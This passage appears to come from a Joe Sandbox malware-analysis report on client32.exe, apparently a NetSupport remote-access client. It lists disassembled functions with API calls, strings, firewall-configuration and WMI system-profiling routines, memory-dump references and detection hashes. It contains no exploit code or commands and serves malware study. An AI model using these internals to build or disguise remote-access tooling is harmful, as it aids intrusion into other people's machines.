                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                                                                                    • String ID: bad cast
                                                                                                                                                    • API String ID: 2427920155-3145022300
                                                                                                                                                    • Opcode ID: 0888c3559ae941ddfd3a65509c7b8561ae704fbfc828ce88d4b35523d1ba3580
                                                                                                                                                    • Instruction ID: 8605f433ca934ff223fddf63d9ff4cd14790153354e7e9eb7327a23900883db8
                                                                                                                                                    • Opcode Fuzzy Hash: 0888c3559ae941ddfd3a65509c7b8561ae704fbfc828ce88d4b35523d1ba3580
                                                                                                                                                    • Instruction Fuzzy Hash: 5631F975E00256DFCB05DFA4C880BDEF7B8FB05328F440169D866AB288DB79E904CB91
                                                                                                                                                    Function 111457A0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 146COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                                                                                                                    • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                                                                                                    • API String ID: 3494822531-1878648853
                                                                                                                                                    • Opcode ID: 1e9a8547f1a4d8db54bad5cbccf33acd14b41b9136434f7006fca57feb396e97
                                                                                                                                                    • Instruction ID: 9d2f35c0ca678663173c9787aa50c950699104b7f99c1a06bf1b906e54d037ce
                                                                                                                                                    • Opcode Fuzzy Hash: 1e9a8547f1a4d8db54bad5cbccf33acd14b41b9136434f7006fca57feb396e97
                                                                                                                                                    • Instruction Fuzzy Hash: F3515E76D0422E9BEB15CF24DC50BDDF7B4AF15708F6001A4DC897B681EB716A88CB91
                                                                                                                                                    Function 6CA92F80 Relevance: 10.6, APIs: 7, Instructions: 115COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _calloc.LIBCMT ref: 6CA92FBB
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 6CA9300D
                                                                                                                                                    • InterlockedExchange.KERNEL32(-00039761,00000000), ref: 6CA9301B
                                                                                                                                                    • _calloc.LIBCMT ref: 6CA9303B
                                                                                                                                                    • _memmove.LIBCMT ref: 6CA93049
                                                                                                                                                    • InterlockedDecrement.KERNEL32(-000397B9), ref: 6CA9307F
                                                                                                                                                    • SetEvent.KERNEL32(0000031C,?,?,?,?,?,?,?,?,?,?,?,?,?,?,935334B3), ref: 6CA9308C
                                                                                                                                                      • Part of subcall function 6CA928D0: wsprintfA.USER32 ref: 6CA92965
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Interlocked_calloc$CountDecrementEventExchangeTick_memmovewsprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3178096747-0
                                                                                                                                                    • Opcode ID: ee1a78fabebeeaf760761f120e2bcdfb95ac1fdd5ae294650fb287ad7744603e
                                                                                                                                                    • Instruction ID: 8ea96c168268155aa0594380548b35b2b3f79b4fa31167f35b4c3603af993e9d
                                                                                                                                                    • Opcode Fuzzy Hash: ee1a78fabebeeaf760761f120e2bcdfb95ac1fdd5ae294650fb287ad7744603e
                                                                                                                                                    • Instruction Fuzzy Hash: 794187F6D01209AFDB04DFA9C945AEFB7F8EF48304F008519E519E7640E7719A49CBA0
                                                                                                                                                    Function 1102A6D0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 101COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • IsJPIK.PCICHEK(1EF76653,NSM.LIC,?,1102F092,View,Client,Bridge), ref: 1102A6F6
                                                                                                                                                      • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                                                      • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                      • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                                                      • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free_malloc_memsetwsprintf
                                                                                                                                                    • String ID: IKS$NSM.LIC$Serial_no$_License$iks.lic
                                                                                                                                                    • API String ID: 2814900446-469156069
                                                                                                                                                    • Opcode ID: 6b47238fab61831cef20a34caab7796142392b501bb087f0e81239e19d18b0f2
                                                                                                                                                    • Instruction ID: 268b58c6f7511c145cb41d8ae554306eba274149ba0ed4ca5467e6687dcac3b5
                                                                                                                                                    • Opcode Fuzzy Hash: 6b47238fab61831cef20a34caab7796142392b501bb087f0e81239e19d18b0f2
                                                                                                                                                    • Instruction Fuzzy Hash: 8931AF35E01729ABDB00CFA8CC81BEEFBF4AB49714F104299E826A72C0DB756940C791
                                                                                                                                                    Function 110178F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71synchronizationCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000310,000000FF), ref: 1101792C
                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 11017935
                                                                                                                                                    • _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
                                                                                                                                                    • CoUninitialize.COMBASE ref: 110179C0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                                                                                    • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                                                                                                    • API String ID: 2407233060-578995875
                                                                                                                                                    • Opcode ID: 0942cf205f413e43a7dce2a9957458248f39d685d8b5fb2cae19ac9a1649f750
                                                                                                                                                    • Instruction ID: 979ee595df3e366e36f6db43f9274242a875182caa54ddfda208ac7f01cc4ef4
                                                                                                                                                    • Opcode Fuzzy Hash: 0942cf205f413e43a7dce2a9957458248f39d685d8b5fb2cae19ac9a1649f750
                                                                                                                                                    • Instruction Fuzzy Hash: BE213EB5D0166A9FDB11CFA48C40BBAB7E99F4170CF0000B4EC59DB188EB79D544D791
                                                                                                                                                    Function 11017810 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70synchronizationCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000310,000000FF), ref: 11017842
                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 1101784B
                                                                                                                                                    • _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
                                                                                                                                                    • CoUninitialize.COMBASE ref: 110178D0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                                                                                    • String ID: ChassisTypes$Win32_SystemEnclosure
                                                                                                                                                    • API String ID: 2407233060-2037925671
                                                                                                                                                    • Opcode ID: 645120171e4998cce48753e45b0062292f56c9bef21460c25a07f93c3742c313
                                                                                                                                                    • Instruction ID: 35f99737241494c501e89beb979cd88c9c6eddc8ed8b09fe319fdcc96c080ea2
                                                                                                                                                    • Opcode Fuzzy Hash: 645120171e4998cce48753e45b0062292f56c9bef21460c25a07f93c3742c313
                                                                                                                                                    • Instruction Fuzzy Hash: D7210875D4112A9BD711CFA4CD40BAEBBE89F40309F0000A4EC29DB244EE75D910C7A0
                                                                                                                                                    Function 11139600 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 68COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • DoICFConfig() OK, xrefs: 111396D6
                                                                                                                                                    • Client, xrefs: 11139655
                                                                                                                                                    • DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 111396EC
                                                                                                                                                    • AutoICFConfig, xrefs: 11139650
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CountTick
                                                                                                                                                    • String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
                                                                                                                                                    • API String ID: 536389180-1512301160
                                                                                                                                                    • Opcode ID: e88b596b7c5c4cd1ec5207dbc2eaab29f042a609f248b0ca23653edaa92bfa31
                                                                                                                                                    • Instruction ID: a12453e9faa0d912da9f55e5525ca7a81223e7cd1b6d2efb44fc6fc6c8488c0a
                                                                                                                                                    • Opcode Fuzzy Hash: e88b596b7c5c4cd1ec5207dbc2eaab29f042a609f248b0ca23653edaa92bfa31
                                                                                                                                                    • Instruction Fuzzy Hash: 2B21277CA262AF4AFB12CE75DED4791FA92278232EF010178D515862CCFBB49448CF46
                                                                                                                                                    Function 11096D90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 58comCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 11096DA4
                                                                                                                                                    • CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,111385EB), ref: 11096DBE
                                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000001,111C1B4C,?,?,?,?,?,?,?,111385EB), ref: 11096DDB
                                                                                                                                                    • CoUninitialize.OLE32(?,?,?,?,?,?,111385EB), ref: 11096DF9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFromInitializeInstanceProgUninitialize
                                                                                                                                                    • String ID: HNetCfg.FwMgr$ICF Present:
                                                                                                                                                    • API String ID: 3222248624-258972079
                                                                                                                                                    • Opcode ID: 2f37d598b4012c0c7ec1fc3c7a41f1831d77099e3c9549bb0708a0a7a71d465f
                                                                                                                                                    • Instruction ID: 9199824aa3bd6ebf99e58618a68c234682766c17c5e3bd8f83aabb27c1d0aea9
                                                                                                                                                    • Opcode Fuzzy Hash: 2f37d598b4012c0c7ec1fc3c7a41f1831d77099e3c9549bb0708a0a7a71d465f
                                                                                                                                                    • Instruction Fuzzy Hash: BC11C235F4111DABC700EFA59C84EEFFF789F44705B500468E51ADB104EA25A980C7E1
                                                                                                                                                    Function 110262F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11026306
                                                                                                                                                    • K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11026336
                                                                                                                                                    • SetLastError.KERNEL32(00000078,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026359
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$ErrorFileImageLastNameProcess
                                                                                                                                                    • String ID: GetModuleFileNameExA$GetProcessImageFileNameA
                                                                                                                                                    • API String ID: 4186647306-532032230
                                                                                                                                                    • Opcode ID: 168c0276823b5447779d0ea544bca84f700d76740b4f854a777d5a44096f3b0a
                                                                                                                                                    • Instruction ID: 183e1746e0b9fc2934bd9ec846e99aaf72a90bbb460a81bb2001b4ad07131d97
                                                                                                                                                    • Opcode Fuzzy Hash: 168c0276823b5447779d0ea544bca84f700d76740b4f854a777d5a44096f3b0a
                                                                                                                                                    • Instruction Fuzzy Hash: BE012D72A41319ABE720DEA5EC44F4BB7E8EB88765F40452AF955D7600D630E8048BA0
                                                                                                                                                    Function 11110040 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52synchronizationthreadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,776CC3F0,00000000,?,11110F55,11110AF0,00000001,00000000), ref: 11110057
                                                                                                                                                    • CreateThread.KERNEL32(00000000,11110F55,00000001,00000000,00000000,0000000C), ref: 1111007A
                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,11110F55,11110AF0,00000001,00000000,?,?,?,?,?,11031700), ref: 111100A7
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,11110F55,11110AF0,00000001,00000000,?,?,?,?,?,11031700), ref: 111100B1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
